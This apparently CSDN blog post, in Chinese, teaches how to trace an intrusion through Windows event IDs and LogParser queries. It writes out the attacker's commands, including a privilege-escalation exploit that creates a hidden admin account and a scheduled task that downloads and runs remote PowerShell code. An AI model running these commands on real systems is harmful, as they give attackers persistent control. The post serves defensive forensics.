Windows日志识别入侵痕迹

有小伙伴问:网络上大部分windows系统日志分析都只是对恶意登录事件分析的案例,可以通过系统日志找到其他入侵痕迹吗?
答案肯定是可以的,当攻击者获取webshell后,会通过各种方式来执行系统命令。所有的web攻击行为会存留在web访问日志里,而执行操作系统命令的行为也会存在在系统日志。不同的攻击场景会产生不一样的系统日志,不同的Event ID代表了不同的意义,需要重点关注一些事件ID,分析入侵者在系统中留下的攻击痕迹。

我们通过一个攻击案例来进行windows日志分析,从日志里识别出攻击场景,发现恶意程序执行痕迹,甚至还原攻击者的行为轨迹。

1、信息收集
攻击者在获取webshell权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用来辅助权限提升。

whoami
systeminfo

Windows日志分析:
在本地安全策略中,需开启审核进程跟踪,可以跟踪进程创建/终止。关键进程跟踪事件和说明,如:

4688 创建新进程
4689 进程终止

我们通过LogParser做一个简单的筛选,得到Event ID 4688,也就是创建新进程的列表,可以发现用户Bypass,先后调用cmd执行whami和systeminfo。Conhost.exe进程主要是为命令行程序(cmd.exe)提供图形子系统等功能支持。

Logparser.exe –i:EVT –o:DATAGRID "SELECT * FROM c:\11.evtx"
LogParser.exe  -i:EVT "SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|')  as UserName,EXTRACT_TOKEN(Strings,5,'|')  as ProcessName FROM c:\11.evtx where EventID=4688"

2、权限提升
通过执行exp来提升权限,获取操作系统system权限,增加管理用户。

ms16-032.exe "whoami"
ms16-032.exe "net user test1 abc123! /add"
ms16-032.exe "net localgroup Administrators test1 /add"

Windows日志分析:
在本地安全策略中,需开启审核账户管理,关键账户管理事件和说明。如:

4720  创建用户
4732  已将成员添加到启用安全性的本地组


这里会涉及进程创建,主要关注账户创建和管理用户组变更。从Event ID 4720 ,系统新建了一个test用户,从Event ID 4732的两条记录变化,得到一个关键信息,本地用户test从user组提升到Administrators。

3、管理账号登录
在创建管理账户后,尝试远程登录到目标主机,获取敏感信息。

mstsc /v 10.1.1.188

Windows日志分析:
在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如:

4624 登录成功
4625 登录失败

LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,'|') as EventType,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,18,'|') as Loginip FROM C:\3333.evtx where EventID=4624"

使用LogParser做一下分析,得到系统登录时间,登录类型10 也就是远程登录,登录用户 test,登录IP:10.1.1.1。

4、权限维持
通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现:

schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\""

Windows日志分析:
在本地安全策略中,需开启审核对象访问,关键对象访问事件,如:

4698  创建计划任务
4699  删除计划任务


这里涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置:

相关推荐
©️2020 CSDN 皮肤主题: Age of Ai 设计师:meimeiellie 返回首页
实付 19.90元
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值